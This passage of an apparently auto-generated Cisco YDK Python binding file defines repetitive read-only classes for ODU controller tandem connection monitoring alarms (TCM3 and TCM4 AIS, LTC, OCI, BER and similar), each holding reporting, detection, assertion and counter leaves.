            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm2-sd-ber"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm2SdBer']['meta_info']
class Tcm3Ais(_Entity_):
    """
    TCM3 Alarm Indication Signal.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Ais, self).__init__()

        self.yang_name = "tcm3-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-ais"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Ais']['meta_info']
class Tcm3Ltc(_Entity_):
    """
    TCM3 Loss of Tandem connection Monitoring.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc, self).__init__()

        self.yang_name = "tcm3-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-ltc"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Ltc']['meta_info']
class Tcm3Oci(_Entity_):
    """
    TCM3 Open Connection Indication.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Oci, self).__init__()

        self.yang_name = "tcm3-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-oci"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Oci']['meta_info']
class Tcm3Lck(_Entity_):
    """
    TCM3 Upstream Connection Locked.

    Operational (read-only) alarm state; all leaves are ``config: False``.

    .. attribute:: reporting_enabled
        Is reporting enabled?  (**type**\: bool)
    .. attribute:: is_detected
        Is defect detected?  (**type**\: bool)
    .. attribute:: is_asserted
        Is defect declared?  (**type**\: bool)
    .. attribute:: counter
        Alarm counter  (**type**\: int, **range:** 0..18446744073709551615)
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated binding.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Lck, self).__init__()

        self.yang_name = "tcm3-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Python attribute name -> (YLeaf metadata, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-lck"
        # Must be assigned last: freezes the attribute set enforced by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK runtime so only known leaf names may be set.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Lck']['meta_info']
class Tcm3Iae(_Entity_):
    """
    TCM3 Incoming Alignment Error

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Iae, self).__init__()

        self.yang_name = "tcm3-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-iae"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Iae']['meta_info']
class Tcm3Biae(_Entity_):
    """
    TCM3 Backward Incoming Alignment Error

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Biae, self).__init__()

        self.yang_name = "tcm3-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-biae"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Biae']['meta_info']
class Tcm3Bdi(_Entity_):
    """
    TCM3 Backward Defect Monitoring

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi, self).__init__()

        self.yang_name = "tcm3-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-bdi"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi']['meta_info']
class Tcm3Tim(_Entity_):
    """
    TCM3 Trail Trace Identifier Mismatch

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3Tim, self).__init__()

        self.yang_name = "tcm3-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-tim"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Tim']['meta_info']
class Tcm3SfBer(_Entity_):
    """
    TCM3 SF BER alarm

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer, self).__init__()

        self.yang_name = "tcm3-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-sf-ber"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer']['meta_info']
class Tcm3SdBer(_Entity_):
    """
    TCM3 SD BER alarm

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer, self).__init__()

        self.yang_name = "tcm3-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm3-sd-ber"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer']['meta_info']
class Tcm4Ais(_Entity_):
    """
    TCM4 Alarm Indication Signal

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Ais, self).__init__()

        self.yang_name = "tcm4-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-ais"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Ais']['meta_info']
class Tcm4Ltc(_Entity_):
    """
    TCM4 Loss of Tandem connection Monitoring

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc, self).__init__()

        self.yang_name = "tcm4-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-ltc"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc']['meta_info']
class Tcm4Oci(_Entity_):
    """
    TCM4 Open Connection Indication

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Oci, self).__init__()

        self.yang_name = "tcm4-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-oci"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Oci']['meta_info']
class Tcm4Lck(_Entity_):
    """
    TCM4 Upstream Connection Locked

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Lck, self).__init__()

        self.yang_name = "tcm4-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-lck"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Lck']['meta_info']
class Tcm4Iae(_Entity_):
    """
    TCM4 Incoming Alignment Error

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Iae, self).__init__()

        self.yang_name = "tcm4-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-iae"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Iae']['meta_info']
class Tcm4Biae(_Entity_):
    """
    TCM4 Backward Incoming Alignment Error

    All leaves are operational state (**config**\: False).

